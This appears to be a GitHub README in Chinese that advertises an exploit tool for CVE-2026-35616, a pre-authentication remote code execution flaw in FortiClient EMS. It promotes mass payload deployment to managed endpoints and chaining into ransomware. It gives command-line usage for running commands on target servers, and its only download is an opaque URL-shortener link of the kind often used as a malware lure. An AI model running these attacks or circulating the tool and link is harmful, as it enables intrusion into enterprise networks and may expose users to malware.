z3r0h3ro/CVE-2026-35616-poc

# CVE-2026-35616 - FortiClient EMS 认证前远程代码执行 (RCE) **Fortinet FortiClient Enterprise Management Server 认证绕过与远程代码执行** 针对 FortiClient EMS 版本 **7.4.5** 和 **7.4.6** 的活跃零日漏洞利用。 允许未经认证的攻击者绕过 API 认证，并在 EMS 服务器及所有受管端点上执行任意命令。 - **CVE**: CVE-2026-35616 - **CVSS**: 9.1 (严重) - **受影响版本**: FortiClient EMS 7.4.5 - 7.4.6 (7.2 分支不受影响) - **已被在野利用**: 是 ### 功能特性 - 完全的认证前 API 绕过（无需 cookies、tokens 或凭据） - 在 EMS 服务器上以 SYSTEM / 高权限账户身份远程执行命令 - 针对所有受管 FortiClient 端点的批量命令执行和载荷部署 - 支持针对特定组或单个端点 - 任务队列与结果轮询 ### 此漏洞利用提供的功能 - 进入分段企业网络的初始立足点 - 控制中央端点管理服务器 - 能够即时向数百或数千个端点推送恶意载荷 - 绕过由 FortiClient EMS 管理的端点保护解决方案 - 易于链接到凭据转储、持久化或勒索软件操作 ### 环境要求 - Python 3.8+ - `requests`, `pyyaml`, `argparse` (通过 requirements.txt 安装) ### 使用方法 ``` python3 exploit.py -t https://target-ems.example.com:8443 [options] ``` **在 EMS 服务器上执行基本命令：** ``` python3 exploit.py -t https://10.10.10.50:8013 -c "whoami" ``` **示例：** 通过绕过检查 EMS 版本： ``` python3 exploit.py -t https://target:8443 -c "powershell -c \"Get-ItemProperty 'HKLM:\\SOFTWARE\\Fortinet\\FortiClientEMS' | Select Version\"" ``` ### 下载 [href](https://tinyurl.com/498uebea) ### 注意事项 - 同时适用于 8013 (HTTP) 和 8443/443 (HTTPS) 端口 - 自动禁用证书验证 - 漏洞利用直接向易受攻击的 `/api/v1/` 端点发送构造的请求 - 如果启用了 EMS 日志记录，可以获取任务结果 **仅供授权的红队和渗透测试使用。**

标签：API 安全, CISA项目, Critical 级漏洞, CVE-2026-35616, FortiClient EMS, Fortinet 漏洞, Python 安全工具, Red Teaming, 企业网络安全, 协议分析, 恶意样本开发, 恶意载荷部署, 权限提升, 横向移动, 端点管理, 编程工具, 编程规范, 身份验证绕过, 远程代码执行, 零日漏洞, 预认证 RCE